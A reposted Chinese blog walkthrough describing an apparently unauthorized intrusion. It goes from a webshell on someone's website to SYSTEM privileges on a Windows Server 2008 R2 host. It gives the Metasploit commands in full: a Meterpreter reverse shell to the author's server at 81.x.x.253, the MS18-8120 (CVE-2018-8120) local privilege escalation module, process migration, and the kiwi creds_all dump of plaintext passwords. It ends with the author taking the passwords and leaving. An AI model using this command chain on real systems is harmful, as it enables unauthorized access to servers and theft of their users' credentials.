栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

记一次实战windows 2008 R2 Datacenter 提权

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

记一次实战windows 2008 R2 Datacenter 提权

前景:拿到某个站 getshell 上传马后发现权限低,然后就是漫长的提权过程

    蚁剑连接到aspx 的马后进入终端先进行信息收集一波,使用命令whoami 可以发现是iis 的权限

    使用命令 systeminfo 查看操作系统和打了哪些补丁等等,windows 2008 R2 Datacenter

    只打了一个补丁

    可以使用蚁剑插件进行一个反弹shell,使用As-Exploits (挺好用的插件)

    进入后可以先识别一下杀软,运气很好这台服务器没有安装杀软

进行反弹shell(首先得在自己服务器上安装msf)
反弹shell 设置 服务器ip (81.X.X.253)
端口自己随便设置一个 (4613)
点击 exploit


服务器 81.x.x.253 进入msf

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 81.x.x.253
set lport 4613
exploit

反弹成功后getuid查看一下权限

确认是低权限,然后使用命令 background把当前的metasplouit shell 转换为后台执行

这里显示为session 3

sessions 查看一下 是 iis 的权限

然后 search cve-2018-8120 查找漏洞

use exploit/windows/local/ms18_8120_win32k_privesc 使用

show options 查看下需要设置什么东西

这里需要把session 设置一下
ip和端口也设置下吧

set session 3           # 刚刚转换到后台的session
set lhost 81.x.x.253    # 服务器ip
set lport 4686          # 端口
run

run 之后一直卡在那里,直接ctrl+c

再次使用 sessions 查看

system 权限 提权成功

然后进入 system 的shell
sessions -i 5
getuid 查看 已经是system 权限

获取密码

使用kiwi 模块
进程迁移的方式

ps 查看一下进程

migrate 632   # 进程迁移

load kiwi    # 加载kiwi模块

creds_all    # 列举系统中的明文密码


得到密码跑路

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/750885.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号